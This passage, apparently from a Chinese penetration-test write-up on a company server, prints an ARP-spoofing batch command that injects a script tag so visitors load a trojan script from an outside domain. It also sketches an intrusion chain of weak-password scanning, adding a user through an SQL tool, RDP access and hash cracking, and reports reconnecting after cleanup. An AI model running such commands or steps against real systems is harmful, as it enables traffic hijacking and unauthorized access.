对某软件公司的一次安全检测

核心提示： 图20查找系统漏洞并修复2.找到系统arp挂马代码在系统wmpub目录中发现大量的可执行文件和批处理，直接查看crss.bat脚本文件，对某软件公司的一次安全检测(7)，如图21所示，其代码如下：smss.exe -idx 0 -ip 221.5.250.2-221.5.250.130 -

图20查找系统漏洞并修复

2.找到系统arp挂马代码

在系统wmpub目录中发现大量的可执行文件和批处理，直接查看crss.bat脚本文件，如图21所示，其代码如下：

smss.exe -idx 0 -ip 221.5.250.2-221.5.250.130 -port 80 -insert "

< SCRIPT language=javascript src="

(A href='http://www.forklift-shuangli.com/ccwu/admin/up/flash.js")

%20(%20/%20script') http://www.forklift-shuangli.com/ccwu/admin/up/flash.js">

< / SCRIPT < A > > " -spoofmode 2

该代码为典型的流量劫持，将访问221.5.250.2-221.5.250.130网段的80端口全部转向到“http://www.forklift-shuangli.com/ccwu/admin/up/flash.js”地址，该地址明显为木马地址。

图21找到arp挂马代码

3.使用autoruns软件查看系统服务等情况

使用autoruns软件查看系统的服务等运行情况，在其中可以看到有灰鸽子服务，直接删除其中的一些木马程序和可疑程序，如图22所示。

图22 找到灰鸽子服务

4.使用360安全卫士进行安全加固

下载360安全卫士最新版本，运行360安全卫士，使用其来查杀系统中的木马等病毒，如图23所示，在安装时就检测出3个病毒文件，安装完毕后，查杀系统中的恶意插件以及病毒。

图23使用360卫士查杀病毒

四、总结与收获

本次检测使用的是一些比较简单的技术，弱口令扫描，然后就是利用“SQL综合利用工具”直接连接数据库，通过添加用户直接登录3389，进而全面控制系统。在系统中发现了包括灰鸽子在内的多个木马程序，其中还有arp挂马程序，后面通过获取系统密码hash，通过导入lc5破解，发现该系统的密码就是数据库sa所对应的密码，如图24所示，如果在最初使用这个密码尝试一下，会更快的进入系统，这就是社会工程学的厉害之处。

图24 使用lc5破解系统密码

在文章结束时，对该服务器重新进行连接，发现添加到用户已经被删除，ftp也设置密码，但是通过sqltools仍然可以连接进入系统。